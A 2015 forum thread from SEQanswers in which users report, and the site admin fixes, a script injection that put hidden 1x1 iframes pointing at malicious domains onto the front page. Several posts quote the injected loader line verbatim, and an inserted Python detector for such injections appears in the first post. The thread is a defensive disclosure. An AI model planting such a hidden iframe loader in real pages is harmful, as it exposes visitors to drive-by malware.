script injection : seqanswers security Q?
  • script injection : seqanswers security Q?

    Just checking on this.

    Is this legit? If it's not, are others seeing this too?

    When I load seqanswers.com ; the first html is a request for a script from
    http://xrrkp.yourrevolution.xyz:9449

    Example:
    <script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
    <head>

    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Pragma" content="no-cache" />
    <meta http-equiv="Expires" content="0" />

    <title>SEQanswers Home </title>



    This is blocked by my local antivirus software.

    The domain http://www.domainiq.com/domain?yourrevolution.xyz
    was registered 9 hours ago.

    Is there something fishy going on?
    ___
    Edit:

    Now it is trying to load from http://pkpgk.yourspin.xyz:32551
    Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.

    ____

    I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.

    Can others "view source" on seqanswers and confirm whether this is specific to seqanswers.com? Just check the first lines of text.

    I am getting this on both Chrome and Mozilla.

    Traceroute is ...
    traceroute 46.108.156.159
    traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
    (first 8 internal to my site removed)
    9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
    10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
    11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
    12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
    13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
    14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
    15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
    16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
    17 * * *
    18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
    ____
    Edit: others at my site are getting it, too.
    Last edited by Richard Finney; 07-09-2015, 07:25 AM.
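    As an added example (not code from the thread or from SEQanswers), here is a small Python check that does what the post above suggests doing by hand: look at the first bytes of the served page and flag anything sitting in front of the DOCTYPE, plus any hidden 1x1 iframe pointing at a third-party host. The sample HTML is constructed from the source quoted above; treating seqanswers.com as the monitored host is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the tampered source quoted in the thread:
# a document.write()'d 1x1 iframe sits in front of the DOCTYPE.
INJECTED_HTML = (
    "<script>document.write(\"<iframe width='1' height='1' "
    "src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825' "
    "scrolling='' frameborder='0'></iframe>\")</script>"
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n'
    '<html dir="ltr" lang="en"><head><title>SEQanswers Home </title></head></html>\n'
)
# The same page as it should be served (constructed): everything from the DOCTYPE on.
CLEAN_HTML = INJECTED_HTML[INJECTED_HTML.index("<!DOCTYPE"):]

SITE_HOST = "seqanswers.com"  # assumed: the site whose front page is being monitored

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(['"])(.*?)\2""")

def check_front_page(html, site_host=SITE_HOST):
    """Return human-readable findings; an empty list means nothing looked tampered with."""
    findings = []
    m = DOCTYPE_RE.search(html)
    prefix = html if m is None else html[: m.start()]
    if prefix.strip():
        # Legitimate pages start with the DOCTYPE; injected loaders are prepended before it.
        findings.append("bytes precede <!DOCTYPE>: " + prefix.strip()[:40] + "...")
    if m is None:
        findings.append("no DOCTYPE found")
    for attrs in IFRAME_RE.findall(html):
        a = {k.lower(): v for k, _, v in ATTR_RE.findall(attrs)}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append("iframe to third-party host " + host)
        if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
            findings.append("hidden (" + a["width"] + "x" + a["height"] + ") iframe")
    return findings

def injected_hosts(html, site_host=SITE_HOST):
    """Hostnames of third-party iframes, ready for a whois lookup like the one in the post."""
    prefix = "iframe to third-party host "
    return sorted({f[len(prefix):] for f in check_front_page(html, site_host) if f.startswith(prefix)})

if __name__ == "__main__":
    for label, page in (("injected", INJECTED_HTML), ("clean", CLEAN_HTML)):
        print(label, check_front_page(page) or "OK")
```

    A UTF-8 BOM or a server-side comment placed before the DOCTYPE would also trip the first check, so compare against a known-good copy of the page before alerting.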

  • #2
    Code:
    <script>document.write("<iframe width='1' height='1' src='http://gcqwgonvjv.your-trend.xyz:48310/punish/74636/alter/wonderful/load/79852/chuckle/another/date/33701/arrange/562/sugar/67761/matter/49098/find/33964/tidings/hush/opportunity/39426/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
    <head>
    
    	<meta http-equiv="Cache-Control" content="no-cache" />
    	<meta http-equiv="Pragma" content="no-cache" />
    	<meta http-equiv="Expires" content="0" />
    
    
    <title>SEQanswers Home </title>

    • #3
      your-trend.xyz is the same server (in Romania)?


      So it's not some local injection.

      Whois reports:

      Email is associated with ~46 domains
      Reverse Whois
      Registrant Org Max Vlapet is associated with ~40 other domains
      Dates Created on 2015-07-09 - Expires on 2016-07-09 - Updated on 2015-07-09
      Whois Server whois.nic.xyz
      Website
      Website Title None given.
      Whois Record ( last updated on 2015-07-09 )
      Domain Name: YOUR-TREND.XYZ
      Domain ID: D8789917-CNIC
      WHOIS Server: whois.alpnames.com
      Referral URL: http://www.alpnames.com
      Updated Date: 2015-07-09T14:14:47.0Z
      Creation Date: 2015-07-09T14:14:46.0Z
      Registry Expiry Date: 2016-07-09T23:59:59.0Z
      Sponsoring Registrar: AlpNames Limited
      Sponsoring Registrar IANA ID: 1857
      Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
      Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
      Domain Status: addPeriod https://icann.org/epp#addPeriod
      Registrant ID: ALP_44867689
      Registrant Name: Max Vlapet
      Registrant Organization: N/A
      Registrant Street: Mausoleum str, pl.13
      Registrant City: Moscow
      Registrant State/Province: Moscow
      Registrant Postal Code: 123006
      Registrant Country: RU
      Registrant Phone: +7.4959826524
      Registrant Phone Ext:
      Registrant Fax:
      Registrant Fax Ext:
      Registrant Email:
      Name Server: NS2.YOUR-TREND.XYZ
      Name Server: NS1.YOUR-TREND.XYZ
      DNSSEC: unsigned

      • #4
        Load the seqanswers front page.
        View the source.

        Note the PHISH(?) injection at the top?

        I got this just now ...

        <script>document.write("<iframe width='1' height='1' src='http://yuarzwpcf.yqxjoksljg.cf:9654/slip/49615/peculiar/curiosity/embarrass/15638/brandy/wife/disgust/80297/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
        <head>

        <meta http-equiv="Cache-Control" content="no-cache" />
        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />

        <title>SEQanswers Home </title>

        It's also loading from gvfwytmdxobu.tk; .tk is not a supported top-level domain, according to http://whois.icann.org/en/lookup?name=yqxjoksljg.cf ????

        https://en.wikipedia.org/wiki/.tk#Abuse
        Last edited by Richard Finney; 07-10-2015, 07:11 AM.

        • #5
          Can you PM ECO about this?

          • #6
            On it. Thanks guys.

            • #7
              Whew. Pretty easy cleanup. Culprit was an old ad server.

              Forums have been upgraded and are using a new ad server that is (at least for now) free of exploits.

              Please verify that you're not seeing the previous problems, and let me know asap if you see any other weirdness.

              Sorry about that all!

              • #8
                I'm not seeing the injected script.

                • #9
                  Thanks for fixing this quickly!

                  • #10
                    Script injection is happening again. Fri Jul 17 10:49:19 EDT 2015

                    This time it's ...
                    zosnoeem.lzokxrvrcmtprgesy.ml

                    http://whois.domaintools.com/lzokxrvrcmtprgesy.ml

                    • #11
                      I have let ECO know.

                      • #12
                        Got it again. Turns out it wasn't the ad server. Not going to say what it is for now.

                        • #13
                          Flood attacks whenever it happens...

                          • #14
                            Upping the security level of cloudflare to prevent it again until I can upgrade the vulnerable component. Apologies for the 5 second delay.

                            • #15
                              Thanks to Richard Finney for notification and GenoMax for his rapid locating of both 1.) me and 2.) the likely exploit.

                              The version of the front page CMS I'm using had an exploit, which I have upgraded.

                              I'm going to leave the CloudFlare security challenge on through the weekend to stop further DDoS/overload attacks; I welcome feedback on how annoying it is.
